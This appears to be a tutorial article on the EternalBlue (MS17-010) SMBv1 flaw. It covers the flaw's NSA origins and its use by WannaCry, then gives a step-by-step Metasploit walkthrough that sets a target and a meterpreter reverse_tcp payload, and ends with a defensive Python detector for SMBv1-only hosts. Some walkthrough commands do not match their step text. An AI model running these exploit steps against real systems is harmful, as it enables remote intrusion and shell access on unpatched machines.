
Eternal Blue Exploit | Windows Vulnerability | MS17-010

EternalBlue Exploit

EternalBlue is the name given both to a series of Microsoft software vulnerabilities and to the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit, officially named MS17-010 by Microsoft, affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyberattacks.

The origins of the SMB vulnerability are what spy stories are made of — dangerous NSA hacking tools leaked, a notorious group called Shadow Brokers on the hunt for common vulnerabilities and exposures, and a massively popular operating system used by individuals, governments, and corporations worldwide.

According to statements made by Microsoft, EternalBlue was developed by the United States' National Security Agency as part of its controversial program of stockpiling and weaponizing cybersecurity vulnerabilities, rather than flagging them to the appropriate vendor.

The NSA allegedly spent almost a year hunting for a bug in Microsoft's software. Once they found it, the NSA developed EternalBlue to exploit the vulnerability. The NSA used EternalBlue for five years before alerting Microsoft to its existence. Microsoft has since called upon the NSA and other government bodies to support a Digital Geneva Convention, which calls for an end to nation-state stockpiling of software vulnerabilities.

EternalBlue used in cyberattacks

EternalBlue has been famously used to spread WannaCry and Petya ransomware. But the exploit can be used to deploy any type of cyberattack, including cryptojacking and worm-like malware. The NSA hack opened the door for any attacker to send a malicious packet to a vulnerable server that has not applied the patch to fix CVE-2017-0144.

STEP 1: The first thing we need to do is open a terminal in Kali and type msfconsole to start Metasploit.

    msf5 > search eternalblue

STEP 2: Next, use the search command within Metasploit to locate a suitable module to use. There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010. It's always a good idea to perform the necessary recon like this.

    use exploit/windows/smb/ms17_010_eternalblue

STEP 3: Run the module and list its settings with the options command.

STEP 4: Now we need to specify the IP address of the target.

    set RHOSTS 192.168.255.130      (Target IP)

STEP 5: Next, we can load the reverse_tcp shell as the payload.

    set payload windows/x64/meterpreter/reverse_tcp

STEP 6: Finally, set the listening host to the IP address of our local machine.

    set LHOST 192.168.255.141       (Your IP)

STEP 7: Now the only thing left to do is launch the exploit. Use the run command to fire it off.

    > ifconfig
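
Because the risk described above is tied to hosts that still speak SMBv1, a defender's first task is finding them. The following is an added example, not part of the original article: it classifies captured TCP/445 payloads by SMB protocol version and offered dialects. The function names, result labels and sample packets are constructed for illustration.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72      # SMB1 command code for Negotiate
SMB_FLAGS_REPLY = 0x80        # set in the Flags byte of server responses
HDR = 32                      # fixed SMB1 header length

def parse_negotiate(payload: bytes):
    """Return (protocol, offered_dialects) for one TCP/445 payload, or None."""
    if len(payload) < 8 or payload[0] != 0x00:   # 0x00 = session message
        return None
    msg = payload[4:4 + int.from_bytes(payload[1:4], "big")]
    if msg[:4] == SMB2_MAGIC:
        return ("SMB2+", [])
    if msg[:4] != SMB1_MAGIC or len(msg) < HDR + 3:
        return None
    if msg[4] != SMB_COM_NEGOTIATE or msg[9] & SMB_FLAGS_REPLY:
        return ("SMB1", [])                      # SMB1 traffic, no dialect list
    off = HDR + 1 + 2 * msg[HDR]                 # skip WordCount and any words
    if len(msg) < off + 2:
        return None
    (byte_count,) = struct.unpack_from("<H", msg, off)
    data = msg[off + 2: off + 2 + byte_count]
    # Each dialect is 0x02 (buffer format) + NUL-terminated ASCII name.
    names = [d[1:].decode("ascii", "replace")
             for d in data.split(b"\x00") if d[:1] == b"\x02"]
    return ("SMB1", names)

def classify(payload: bytes) -> str:
    parsed = parse_negotiate(payload)
    if parsed is None:
        return "not-smb"
    proto, dialects = parsed
    if proto == "SMB2+":
        return "smb2-or-later"
    if any(d.startswith("SMB 2") for d in dialects):
        return "smb1-negotiate-offers-smb2"      # multi-protocol negotiate
    return "smb1-only"      # only SMB1 dialects offered, or SMB1 session traffic

def build_smb1_negotiate(dialects):
    """Constructed sample: a minimal SMB1 Negotiate request (not a capture)."""
    body = b"".join(b"\x02" + d.encode() + b"\x00" for d in dialects)
    msg = (SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + bytes(27)
           + b"\x00" + struct.pack("<H", len(body)) + body)
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

if __name__ == "__main__":
    for name, pkt in [("legacy", build_smb1_negotiate(["LANMAN1.0", "NT LM 0.12"])),
                      ("modern", build_smb1_negotiate(["NT LM 0.12", "SMB 2.002"]))]:
        print(name, classify(pkt))
```

Hosts reported as smb1-only are the ones to prioritise for patching and for disabling SMBv1.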
